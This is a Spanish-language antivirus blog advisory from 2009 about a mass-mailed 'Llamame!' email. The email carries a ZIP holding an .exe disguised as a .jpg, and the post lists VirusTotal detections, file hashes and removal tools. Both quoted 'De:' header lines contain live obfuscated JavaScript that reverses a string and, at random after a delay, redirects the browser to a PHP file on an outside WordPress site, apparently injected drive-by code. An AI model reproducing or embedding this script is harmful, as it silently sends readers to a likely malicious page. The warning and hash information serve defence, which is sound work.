Nuevo virus que se recibe por mail masivo, con el asunto Llamame! y adjuntando un .ZIP que contiene un aparente .jpg
Un nuevo virus que se propaga por mail masivo, está propagandose por internet, de lo cual avisamos para evitarlo en lo posible:
Asunto: Fwd: Llamame!
De: $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:sammy.landin@%3Cdominio”>sammy.landin@<dominio destino>
Prioridad: Normal
Opciones: Ver encabezado completo | Vista preliminar | Bajar este mensaje como un archivo | Ver detalles
Hello, {#TO_NAME}.
July, Wednesday 16, 2009, 1:33:42 AM, you wrote:
> Hola.
> Te quiero con todo mi corazon y el alma. Te extrano tanto.
> Envio mi foto. Por favor, no lo muestras a su familia y amigos.
> Muchos besos, tu amor.
Hola! Super bonita foto 🙂 Llamame: 34 079383590
—
Best regards,
{#FROM_NAME} to:{#FROM_NAME}@{#FROM_DOMAIN}
Ficheros adjuntos:
DC0018.zip 0 k [ application/x-zip-compressed ] Descargar
__________
Otros llegan ligeramente distintos, cambiando destinatario (lo falsea) y remitente
Asunto: Fwd: Llamame!!
De: $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:virus666@ole.com”>virus666@ole.com
Prioridad: Normal
Opciones: Ver encabezado completo | Vista preliminar | Bajar este mensaje como un archivo | Ver detalles
Hello, virus666.
July, Wednesday 16, 2009, 12:50:54 AM, you wrote:
> Hola.
> Te quiero con todo mi corazon y el alma. Te extrano tanto.
> Envio mi foto. Por favor, no lo muestras a su familia y amigos.
> Muchos besos, tu amor.
Hola! Super bonita foto 🙂 Llamame: 34 492040775
—
Best regards,
lagudelo to:lagudelo@ortiz.es
_____________
Desempaquetado el ZIP aparece un fichero con un paisaje como icono, y de las siguientes caracteristicas:
nombre DC0034.jpg__________________________________________________________________________________________.exe
tamaño 31232 bytes (25,4 el empaquetado)
El analisis actual de VirusTotal detecta:
File DC0034.jpg_______________________ received on 2009.07.17 07:00:09 (UTC)
Current status: Loading … queued waiting scanning finished NOT FOUND STOPPED
Result: 11/41 (26.83%)
Antivirus Version Last Update Result
a-squared 4.5.0.24 2009.07.17 –
AhnLab-V3 5.0.0.2 2009.07.16 –
AntiVir 7.9.0.220 2009.07.17 TR/Crypt.XPACK.Gen
Antiy-AVL 2.0.3.7 2009.07.17 –
Authentium 5.1.2.4 2009.07.17 W32/Heuristic-CO3!Eldorado
Avast 4.8.1335.0 2009.07.16 –
AVG 8.5.0.387 2009.07.16 –
BitDefender 7.2 2009.07.17 –
CAT-QuickHeal 10.00 2009.07.17 –
ClamAV 0.94.1 2009.07.17 –
Comodo 1677 2009.07.17 –
DrWeb 5.0.0.12182 2009.07.17 –
eSafe 7.0.17.0 2009.07.16 Suspicious File
eTrust-Vet 31.6.6621 2009.07.17 –
F-Prot 4.4.4.56 2009.07.17 W32/Heuristic-CO3!Eldorado
F-Secure 8.0.14470.0 2009.07.17 –
Fortinet 3.120.0.0 2009.07.17 –
GData 19 2009.07.17 –
Ikarus T3.1.1.64.0 2009.07.17 –
Jiangmin 11.0.800 2009.07.17 –
K7AntiVirus 7.10.794 2009.07.16 –
Kaspersky 7.0.0.125 2009.07.17 Trojan.Win32.Regrun.dgi
McAfee 5678 2009.07.16 New Malware.bx
McAfee+Artemis 5678 2009.07.16 Artemis!3D066099A4F7
McAfee-GW-Edition 6.8.5 2009.07.17 Heuristic.LooksLike.Win32.Suspicious.B
Microsoft 1.4803 2009.07.17 VirTool:Win32/Obfuscator.FO
NOD32 4252 2009.07.17 –
Norman 6.01.09 2009.07.16 –
nProtect 2009.1.8.0 2009.07.17 –
Panda 10.0.0.14 2009.07.16 –
PCTools 4.4.2.0 2009.07.16 –
Prevx 3.0 2009.07.17 –
Rising 21.38.40.00 2009.07.17 –
Sophos 4.43.0 2009.07.17 Mal/Zbot-P
Sunbelt 3.2.1858.2 2009.07.17 –
Symantec 1.4.4.12 2009.07.17 –
TheHacker 6.3.4.3.369 2009.07.16 –
TrendMicro 8.950.0.1094 2009.07.16 PAK_Generic.001
VBA32 3.12.10.8 2009.07.16 –
ViRobot 2009.7.17.1840 2009.07.17 –
VirusBuster 4.6.5.0 2009.07.16 –
Additional information
File size: 31232 bytes
MD5…: 3d066099a4f732277c4a287e15112b97
SHA1..: 88a48a8d616edd1fe8d83e21cbb25336b2e4587b
Como se ve solo es detectado actualmente por 11 de los 41 antivirus del VirusTotal y consiguientemente una deteccion del 26,83 %; pero si de los tres de McAfee consideramos 1 bloque, queda detectado por 9 de 39, lo cual baja la detección al 23,08 %, propia de un virus incipiente, que es cuando los antivirus no lo detectan y consigue su proposito de ir infectando los ordenadores donde se ejecute
Concretamente de los antivirus mas conocidos, estos aun no lo detectan:
Avast 4.8.1335.0 2009.07.16 –
AVG 8.5.0.387 2009.07.16 –
BitDefender 7.2 2009.07.17 –
F-Secure 8.0.14470.0 2009.07.17 –
NOD32 4252 2009.07.17 –
Norman 6.01.09 2009.07.16 –
Panda 10.0.0.14 2009.07.16 –
Symantec 1.4.4.12 2009.07.17 –
Los usuarios de los mismos han de tener especial cuidado con él…
NOTAS AL RESPECTO:
Analizado el malware resulta ser una variante de los típicos “Tienes una factura pendiente” que anexaba un FAKTURA…
Implementamos su control y eliminación a partir del ELISTARA 19.05 de hoy, si bien inmediatamente ya se puede detectar y eliminar con el ELIMD5 introduciendole indistintamente cualquiera de los dos hashes indicados:
3d066099a4f732277c4a287e15112b97
88a48a8d616edd1fe8d83e21cbb25336b2e4587b
Confiamos puedan evitar su ejecución, y sino, ya saben el remedio.
saludos
ms, 17-7-2009
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.